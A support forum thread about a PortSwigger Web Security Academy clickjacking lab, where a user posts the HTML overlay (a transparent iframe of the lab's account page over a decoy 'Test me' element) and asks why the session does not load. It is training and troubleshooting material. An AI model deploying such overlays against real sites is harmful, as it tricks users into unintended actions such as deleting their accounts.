Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum will be discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Centre. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTRE DISCORD

Create new post

"Basic clickjacking with CSRF token protection" lab error

Viktor | Last updated: Aug 25, 2024 10:23AM UTC

When i try embed the iframe of the page with the delete account button my session is not included in the iframe. Instead of showing the myaccount page it shows the login page.

Ben, PortSwigger Agent | Last updated: Aug 26, 2024 07:14AM UTC

Hi Viktor, Are you able to provide us with details of what you exploit looks like? In addition, I assume that you have logged into the wiener/peter user account before you configure the exploit? Finally, what version of Burp are you using?

Viktor | Last updated: Aug 26, 2024 01:42PM UTC

i logged in as wiener, then used the following exploit and clicked "view exploit": <style> iframe { position:relative; width: 500px; height: 700px; opacity: 0.2; z-index: 2; } div { position:absolute; top: 300px; left: 60px; z-index: 1; } </style> <div>Test me</div> <iframe src="https://0a4800630314c9f8812c9d6f0084003f.web-security-academy.net/my-account"></iframe> the iframe doesn't load the session, and i am greeted by the login page. I didn't need to use burp for this particular lab.

Ben, PortSwigger Agent | Last updated: Aug 27, 2024 07:26AM UTC

Hi Viktor, What browser are you using when you attempt this particular lab? If you are using the embedded browser, can you confirm which version of Burp are you using?

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.